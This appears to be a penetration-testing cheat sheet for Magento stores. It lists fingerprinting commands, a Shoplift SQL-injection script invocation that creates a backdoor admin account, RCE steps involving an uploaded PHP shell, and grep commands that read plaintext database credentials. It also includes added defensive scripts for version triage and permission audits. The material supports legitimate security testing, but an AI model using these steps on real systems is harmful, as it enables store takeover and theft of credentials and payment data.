Magento
What it is: E-commerce CMS platform owned by Adobe. Handles payment processing, making it a high-value target. Shoplift and other bugs allow unauthenticated admin access and RCE.
Default ports: 80, 443
Vuln research:
Identify Magento version
Check specific files and headers
curl -s http://$IP/RELEASE_NOTES.txt | head -5
curl -s http://$IP/magento_version
curl -s http://$IP/ | grep "Magento"
# Admin panel usually at: /admin or /index.php/admin
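Added example, not from the original notes: the fingerprinting commands above wrapped into a repeatable check for an inventory sweep. extract_version pulls the first dotted version out of a banner (RELEASE_NOTES.txt on Magento 1, the /magento_version response on Magento 2), version_lt compares dotted versions field by field, and classify_banner applies the threshold given below for Shoplift (fixed in 1.9.2.0). The sample banners are constructed, not captured from any host; fetch_banner is the only part that touches the network and is not called by default.

```shell
#!/bin/sh
# Added example (not from the page): version fingerprint -> Shoplift exposure triage.
# Sample banners below are constructed for this example.

# Print the first dotted version number (e.g. 1.9.1.0, 2.4) found in the text argument.
extract_version() {
  printf '%s\n' "$1" | awk '
    match($0, /[0-9]+(\.[0-9]+)+/) { print substr($0, RSTART, RLENGTH); exit }'
}

# Exit 0 when dotted version $1 is strictly lower than $2; missing fields count as 0,
# so "1.9" < "1.9.2.0". Non-numeric suffixes such as "-beta" are ignored.
version_lt() {
  v1=$1; v2=$2
  while [ -n "$v1" ] || [ -n "$v2" ]; do
    p1=${v1%%.*}; p2=${v2%%.*}
    p1=${p1%%[!0-9]*}; p2=${p2%%[!0-9]*}
    [ -n "$p1" ] || p1=0
    [ -n "$p2" ] || p2=0
    [ "$p1" -lt "$p2" ] && return 0
    [ "$p1" -gt "$p2" ] && return 1
    case $v1 in *.*) v1=${v1#*.} ;; *) v1= ;; esac
    case $v2 in *.*) v2=${v2#*.} ;; *) v2= ;; esac
  done
  return 1
}

# Exit 0 when the banner identifies Magento older than 1.9.2.0; exit 2 when no
# version could be read (do not guess in that case).
shoplift_exposed() {
  v=$(extract_version "$1")
  [ -n "$v" ] || return 2
  version_lt "$v" 1.9.2.0
}

# One report line per banner, for an inventory sweep.
classify_banner() {
  v=$(extract_version "$1")
  if [ -z "$v" ]; then
    echo "unknown: no version in banner"
  elif version_lt "$v" 1.9.2.0; then
    echo "$v: below 1.9.2.0, Shoplift (CVE-2015-1397) unpatched"
  else
    echo "$v: at or above 1.9.2.0"
  fi
}

# Live fingerprint of one host, mirroring the curl commands in the notes (network).
# Usage: classify_banner "$(fetch_banner http://$IP)"
fetch_banner() {
  curl -s -m 10 "$1/magento_version"
  curl -s -m 10 "$1/RELEASE_NOTES.txt" | head -5
}

# Constructed sample banners (not captured from any host).
BANNER_M1_OLD='==== 1.9.1.0 ===='
BANNER_M2='Magento/2.4 (Community)'
classify_banner "$BANNER_M1_OLD"   # 1.9.1.0: below 1.9.2.0, Shoplift (CVE-2015-1397) unpatched
classify_banner "$BANNER_M2"       # 2.4: at or above 1.9.2.0
```

Treat the result as a triage signal, not a verdict: Magento 1 security patches (SUPEE-*) are applied on top of an install without changing the reported version, so a 1.9.1.x that has the Shoplift patch applied still reads as "below 1.9.2.0" here. Confirm against the patch list on the host before acting on it.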
Magento Shoplift (CVE-2015-1397)
SQL injection → Admin access — Magento < 1.9.2.0
python2 shoplift.py http://$IP/
# Creates admin account: forme:forme
Magento authenticated RCE
After admin access — Install malicious package or edit templates
# System → Filesystem → IDE → Edit a PHP file
# Or install a malicious Magento Connect package
# Or use Froghopper attack:
# 1. Admin → Allow symlinks in template settings
# 2. Upload PHP shell as image (via category)
# 3. Create newsletter template with symlink to shell
Magento database credentials
app/etc/local.xml (Magento 1) or app/etc/env.php (Magento 2) — plaintext DB creds
grep -A5 "connection" /var/www/html/app/etc/local.xml
grep -A5 "connection" /var/www/html/app/etc/env.php
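Added example, not from the original notes: since both files hold the DB password in plaintext by design, the control is file permissions. Magento's own production guidance strips all "other" bits from env.php; the audit below flags either credential file that anyone on the box can read. The demo tree, the placeholder password and the paths are constructed for this example.

```shell
#!/bin/sh
# Added example (not from the page): audit Magento DB-credential files for
# permissions that let any local user read them. Demo tree is constructed.

# rwx bits for "other" (chars 8-10 of ls -l output), e.g. "r--" for mode 0644.
other_bits() {
  ls -ld "$1" | cut -c8-10
}

# Exit 0 when any user on the host can read, write or execute the file.
config_exposed_to_others() {
  [ "$(other_bits "$1")" != "---" ]
}

# Exit 0 when the file actually carries a password entry, so exposure matters.
holds_db_password() {
  grep -q -i 'password' "$1" 2>/dev/null
}

# One FAIL/WARN/OK line per credential file found under a Magento root.
audit_magento_config() {
  root=$1
  for rel in app/etc/local.xml app/etc/env.php; do
    f="$root/$rel"
    [ -f "$f" ] || continue
    if config_exposed_to_others "$f"; then
      if holds_db_password "$f"; then
        echo "FAIL $rel: mode $(ls -ld "$f" | cut -c1-10), readable by others and holds DB password (fix: chmod o-rwx $rel)"
      else
        echo "WARN $rel: readable by others"
      fi
    else
      echo "OK   $rel: others have no access"
    fi
  done
}

# Number of FAIL lines for a root, for scripting a fleet sweep.
count_config_findings() {
  audit_magento_config "$1" | grep -c '^FAIL' || true
}

# Constructed demo tree: an env.php with a placeholder password, left 0644 as a
# careless deploy might leave it.
make_demo_tree() {
  d=$(mktemp -d)
  mkdir -p "$d/app/etc"
  printf '%s\n' "<?php return ['db' => ['connection' => ['default' => ['password' => 'PLACEHOLDER']]]];" > "$d/app/etc/env.php"
  chmod 644 "$d/app/etc/env.php"
  echo "$d"
}

demo_root=$(make_demo_tree)
audit_magento_config "$demo_root"          # FAIL app/etc/env.php: mode -rw-r--r-- ...
chmod o-rwx "$demo_root/app/etc/env.php"
audit_magento_config "$demo_root"          # OK   app/etc/env.php: others have no access
```

Run it as `audit_magento_config /var/www/html` on a real install. Group read is deliberately allowed, because the web server group normally needs it; what the check refuses is the "other" class, which is what turns a low-privilege local foothold into database access.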